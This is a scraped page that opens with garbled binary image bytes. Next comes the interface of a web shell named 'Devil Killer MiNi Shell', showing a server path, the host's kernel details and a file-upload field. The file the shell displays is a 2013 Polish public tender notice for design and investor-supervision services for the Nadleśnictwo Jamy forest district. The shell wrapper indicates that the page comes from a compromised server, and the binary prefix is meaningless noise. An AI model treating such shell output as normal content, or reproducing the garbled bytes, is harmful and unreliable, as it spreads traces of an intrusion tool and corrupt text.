JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130911/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130911/367496-N-2013.html

<p class="kh_header"><b>Rogóźno: Przetarg nieograniczony - Usługi projektowania budowlanego i nadzoru inwestorskiego na potrzeby Nadleśnictwa Jamy</b><br>
<b>Numer ogłoszenia: 367496 - 2013; data zamieszczenia: 11.09.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Nadleśnictwo Jamy , Jamy 5, 86-318 Rogóźno, woj. kujawsko-pomorskie, tel. 056 4689732, faks 056 4689728.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> jamy.torun.lasy.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Państwowa jednostka organizacyjna nieposiadająca osobowości prawnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przetarg nieograniczony - Usługi projektowania budowlanego i nadzoru inwestorskiego na potrzeby Nadleśnictwa Jamy.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są:
usługi projektowania budowlanego i nadzoru inwestorskiego wg zadań opisanych w załączniku nr 1 do niniejszego SIWZ obejmujących m.in.:
-Inwentaryzację obiektów budowlanych wraz z obmiarami,
-Wykonanie dokumentacji projektowych remontów, napraw i modernizacji budowlanych wraz z kosztorysowaniem inwestorskim,
-Uzyskiwanie i kompletowanie wymaganych prawem uzgodnień i pozwoleń związanych z procesem budowlanym,
-Nadzór inwestorski nad realizacją prac budowlanych.

2. Przedmiot zamówienia składa się z 8 części. Szczegółowy opis przedmiotu zamówienia wraz z podziałem na części zawiera załącznik nr 1 do niniejszego SIWZ. 

3. Zamawiający dopuszcza składanie ofert częściowych.

4. Zamawiający dopuszcza powierzenie realizacji zamówienia podwykonawcom. Wykonawca jest zobowiązany wskazać Zamawiającemu podwykonawców, którym powierzy realizację zamówienia wraz z zakresem powierzonych prac.

5. Usługa projektowania budowlanego będzie następować na podstawie każdorazowo wystawianego i podpisywanego przez strony zlecenia w zakresie ustalonym przez Zamawiającego.

6. Stan dokumentacji musi umożliwiać sprawne i zgodne z obowiązującymi przepisami prowadzenie postępowań o udzielenie zamówienia publicznego, a także realizowanie robót budowlanych.

7.  Usługa nadzoru inwestorskiego będzie następować na podstawie osobnych zleceń każdorazowo wystawianych i podpisywanych przez strony. 

8. Zamawiający dopuszcza możliwość redukcji zakresu zadań do wykonania.

9. Redukcja zakresu zadań może dotyczyć pełnienia funkcji inspektora nadzoru inwestorskiego lub ilości projektowanych budynków..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.50.00.00-3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 8.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Wadium.  Zamawiający wymaga wniesienia wadium   2. Ustala się wadium dla całości przedmiotu zamówienia w wysokości:  3 150,00zł (słownie:  trzy tysiące sto pięćdziesiąt złotych 00/100).     
W przypadku składania ofert częściowych ustala się wadium:

- dla części zamówienia nr 1 w wysokości: 				   1 200,00zł
(słownie: jeden tysiąc dwieście złotych 00/100)   
- dla części zamówienia nr 2 w wysokości:				      270,00zł
(słownie: dwieście siedemdziesiąt złotych 00/100)   
- dla części zamówienia nr 3 w wysokości:   				      400,00zł
(słownie: czterysta złotych 00/100)   
- dla części zamówienia nr 4 w wysokości:   				      550,00zł
(słownie: pięćset pięćdziesiąt złotych 00/100)   
- dla części zamówienia nr 5 w wysokości:   				      210,00zł
(słownie: dwieście dziesięć złotych 00/100)   
- dla części zamówienia nr 6 w wysokości:   				      300,00zł
(słownie: trzysta złotych 00/100)   
- dla części zamówienia nr 7 w wysokości:   				      170,00zł
(słownie: sto siedemdziesiąt złotych 00/100)   
- dla części zamówienia nr 8 w wysokości:   				        50,00zł
(słownie: pięćdziesiąt złotych 00/100)   
3. Wykonawca wnosi wadium:     - w pieniądzu, sposób przekazania: przelewem na konto BGŻ Grudziądz nr:          19 2030 0045 1110 0000 0193 7920.     - w poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej z tym, że zobowiązanie kasy jest zawsze poręczeniem pieniężnym,  - w gwarancjach bankowych 
- w gwarancjach ubezpieczeniowych
- poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000r o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2007r Nr 42, poz. 275, z 2008r. Nr 116, poz. 730 i 732 i Nr 227, poz. 1505 oraz z 2010r. Nr 96, poz.62)  
przed upływem terminu składania ofert. Przy czym za termin wniesienia wadium w formie przelewu pieniężnego przyjmuje się termin uznania na rachunku Zamawiającego.

W treści gwarancji wadialnej muszą być dokonane następujące stwierdzenia:
1) nazwa i adres Zamawiającego,
2) oznaczenie numeru postępowania,
3) określenie przedmiotu zamówienia,
4) nazwę i adres wykonawcy, 
5)	 termin ważności
6)	 z treści gwarancji (poręczenia) musi jednoznacznie wynikać, jaki jest sposób reprezentacji   gwaranta. Gwarancja musi być podpisana przez upoważnionego (upełnomocnionego) przedstawiciela gwaranta. Podpis winien być sporządzony w sposób umożliwiający jego identyfikację np. złożony wraz z imienną pieczątką lub czytelny (z podaniem imienia i nazwiska). Z treści gwarancji winno wynikać bezwarunkowe, na każde pisemne żądanie zgłoszone przez Zamawiającego w terminie związania ofertą, zobowiązanie gwaranta do wypłaty Zamawiającemu pełnej kwoty wadium w okolicznościach określonych w ustawie Prawo zamówień publicznych.

Wadium wnoszone w formach, które określa pkt. VIII.3.b),c),d),e) Wykonawca składa w następujący sposób:
- oryginał poręczeń bankowych, gwarancji bankowych i ubezpieczeniowych należy złożyć w kasie Nadleśnictwa Jamy, Jamy 5, 86-318 Rogóźno - pokój nr 9, przed upływem terminu do składania ofert;

4. Zamawiający zwróci wadium wszystkim Wykonawcom niezwłocznie po wyborze oferty najkorzystniejszej lub unieważnieniu postępowania, z wyjątkiem Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, z zastrzeżeniem pkt. VIII.9.SIWZ.  

5. Wykonawcy, którego oferta zostanie wybrana jako najkorzystniejsza, Zamawiający zwróci wadium niezwłocznie po zawarciu umowy w sprawie zamówienia publicznego.

6. Zamawiający zwróci niezwłocznie wadium, na wniosek Wykonawcy, który wycofa ofertę przed upływem terminu składania ofert.

7. Zamawiający zażąda ponownego wniesienia wadium przez Wykonawcę, któremu zwrócono wadium na podstawie pkt. VIII.4.SIWZ, jeżeli w wyniku rozstrzygnięcia odwołania jego oferta została wybrana jako najkorzystniejsza. Wykonawca wniesie wadium w terminie określonym przez Zamawiającego.

8. Jeżeli wadium zostanie wniesione w pieniądzu, Zamawiający zwróci je wraz z odsetkami wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszone o koszty prowadzenia rachunku bankowego oraz prowizji bankowej za przelew pieniędzy na rachunek bankowy wskazany przez Wykonawcę. 

9. Zamawiający zatrzyma wadium wraz z odsetkami, jeżeli wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26, ust. 3, nie złożył dokumentów lub oświadczeń, o których mowa w art. 25, ust. 1 lub pełnomocnictw, chyba że udowodni, że wynika to z przyczyn nie leżących po jego stronie.

10.  Zamawiający zatrzyma wadium wraz z odsetkami, jeżeli Wykonawca, którego oferta zostanie wybrana:
a)odmówi podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie;
b) nie wniesie wymaganego zabezpieczenia należytego wykonania umowy;
c)zawarcie umowy w sprawie zamówienia publicznego stanie się niemożliwe z przyczyn leżących po stronie Wykonawcy.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, że w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy to w tym okresie, wykonał co najmniej dwie usługi (potwierdzone dowodami, że usługi te zostały wykonane lub są wykonywane należycie) związane z wykonaniem dokumentacji projektowo-kosztorysowej i pełnieniem funkcji inspektora nadzoru inwestorskiego, o wartości nie mniejszej niż:
92 000,00zł netto - dla całości przedmiotu zamówienia,
w przypadku składania ofert częściowych:
35 000,00zł netto - dla części zamówienia nr 1,
  8 000,00zł netto - dla części zamówienia nr 2,
12 000,00zł netto - dla części zamówienia nr 3.
16 000,00zł netto - dla części zamówienia nr 4,
  6 000,00zł netto - dla części zamówienia nr 5,
  9 000,00zł netto - dla części zamówienia nr 6,
  5 000,00zł netto - dla części zamówienia nr 7,
  1 000,00zł netto - dla części zamówienia nr 8,
Wykaz musi zawierać wartości wykazanych usług, przedmiot, daty wykonania i podmioty, na rzecz których usługi zostały wykonane oraz dowody potwierdzające, czy usługi te zostały wykonane lub są wykonywane należycie. 
Dowodami, o których mowa powyżej są:
a)	 Poświadczenie o należytym wykonaniu usługi wskazanej w wykazie, z tym że dla nadal wykonywanych usług okresowych lub ciągłych wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
b)	 Oświadczenie wykonawcy, jeżeli Wykonawca z uzasadnionych przyczyn o obiektywnym charakterze nie jest w stanie uzyskać poświadczenia, o którym mowa w powyższym ppkt. a).
W przypadku, gdy Zamawiający jest podmiotem, na rzecz którego usługi wskazane w wykazie, o którym mowa powyżej, zostały wcześniej wykonane, Wykonawca nie ma obowiązku przedkładania dowodów, o których mowa w powyższych ppkt. a) i b).
W razie konieczności, szczególnie gdy wykaz lub dowody, o których mowa powyżej będą budzić wątpliwości Zamawiającego lub gdy z poświadczenia albo innego dokumentu wynikać będzie, że zamówienie nie zostało wykonane lub zostało wykonane nienależycie, Zamawiający zwróci się bezpośrednio do właściwego podmiotu, na rzecz którego usługi były lub miały zostać wykonane, o przedłożenie dodatkowych informacji lub dokumentów bezpośrednio Zamawiającemu.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, że dysponuje osobami zdolnymi do wykonania zamówienia, posiadającymi doświadczenie, wykształcenie i kwalifikacje zawodowe odpowiednie do stanowisk, jakie zostaną im powierzone, tj.:
a)	jedną osobę z uprawnieniami budownictwa ogólnego
b)	jedną osobę z uprawnieniami budownictwa drogowego
c)	jedną osobę z uprawnieniami branży elektrycznej
Zamawiający dopuszcza sumowanie kilku posiadanych uprawnień w ramach kompetencji jednej osoby.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, że posiada polisę, a w przypadku jej braku inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia - na kwotę nie mniejszą niż:
92 000,00zł netto - dla całości przedmiotu zamówienia,
w przypadku składania ofert częściowych:
35 000,00zł netto - dla części zamówienia nr 1,
  8 000,00zł netto - dla części zamówienia nr 2,
12 000,00zł netto - dla części zamówienia nr 3.
16 000,00zł netto - dla części zamówienia nr 4,
  6 000,00zł netto - dla części zamówienia nr 5,
  9 000,00zł netto - dla części zamówienia nr 6,
  5 000,00zł netto - dla części zamówienia nr 7,
  1 000,00zł netto - dla części zamówienia nr 8,
Wykonawca, który z uzasadnionej przyczyny nie może przedstawić dokumentu wymienionego w pkt. 2.3., a dotyczącego sytuacji finansowej i ekonomicznej, może przedstawić inny dokument, który w sposób wystarczający potwierdzać będzie spełnienie tego warunku.
W przypadku, gdy Wykonawca dla potwierdzenia spełniania warunku dotyczącego sytuacji ekonomicznej i finansowej przedstawi dokumenty zawierające kwoty wyrażone w walutach innych niż złoty polski, Zamawiający przeliczy je na PLN. Do przeliczenia zostanie zastosowany wyliczony i ogłoszony przez Narodowy Bank Polski bieżący kurs średni wymiany na dzień wystawienia dokumentu potwierdzającego spełnianie warunku.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Postanowienia umowy zawarto w: 
projekcie umowy, który stanowi załącznik nr 11 do SIWZ. 
2. Zamawiający przewiduje możliwość zmiany umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy.

Zmiany, o których mowa w pkt. 2 mogą zostać dokonane, jeżeli ich uzasadnieniem są niżej wymienione okoliczności:
1)Zmiana terminu realizacji przedmiotu umowy spowodowana w szczególności:
a)niekorzystnymi warunkami atmosferycznymi uniemożliwiającymi prowadzenie robót budowlanych, przeprowadzanie prób i sprawdzeń, dokonywanie odbiorów itp.;
b)koniecznością wykonania robót, których wykonanie w sposób obiektywny uniemożliwia terminowe zakończenie realizacji przedmiotu umowy;
c)wstrzymaniem prac przez właściwe organy z przyczyn niezależnych od Wykonawcy;
d)dla wykonania dokumentacji projektowo-kosztorysowej - wydłużeniem terminu uzyskania stosownych zaświadczeń, decyzji itp., z przyczyn niezależnych od Wykonawcy;
e)dla sprawowania nadzoru autorskiego - przedłużeniem realizacji robót budowlanych;
f)innymi przyczynami zewnętrznymi niezależnymi od Wykonawcy 
i Zamawiającego skutkujące niemożliwością prowadzenia prac.
2)Zmiana osób realizujących przedmiot umowy, wskazanych w ofercie Wykonawcy, 
w szczególności osób określonych w pkt. V.2.,2.2 SIWZ może być dokonana w sytuacji:
a)na wniosek Wykonawcy w przypadku:
-śmierci, choroby lub innego zdarzenia losowego,
-nienależytego wykonywania powierzonych prac przez Podwykonawcę,
-innych obiektywnych okoliczności niezależnych od Wykonawcy (np. rezygnacji).
Uwaga: w przypadku zmiany osób, w szczególności wymienionych w pkt V.2.,2.2 SIWZ Wykonawca musi przedstawić kandydaturę innej osoby spełniającej warunki zawarte w SIWZ i uzyskać zgodę Zamawiającego. 
3)Zmiana osoby pełniącej nadzór z ramienia Zamawiającego, może być dokonana 
w przypadku:
-śmierci, choroby lub innego zdarzenia losowego,
-nienależytego wykonywania powierzonych prac,
-innych obiektywnych okoliczności niezależnych od Zamawiającego (np. rezygnacji).
4)Zmiana podwykonawców może być dokonana w sytuacji:
a)na wniosek Wykonawcy w przypadku:
-nienależytego wykonywania powierzonych prac,
-innych obiektywnych okoliczności niezależnych od Wykonawcy (np. rezygnacji).
5)Zmiana podatku VAT będzie możliwa w przypadku gdy nastąpi zmiana obowiązujących w tym względzie przepisów prawa.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> jamy.torun.lasy.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Nadleśnictwo Jamy, Jamy 5, 86-318 Rogóźno.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 20.09.2013 godzina 08:00, miejsce: Nadleśnictwo Jamy, Jamy 5, 86-318 Rogóźno.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
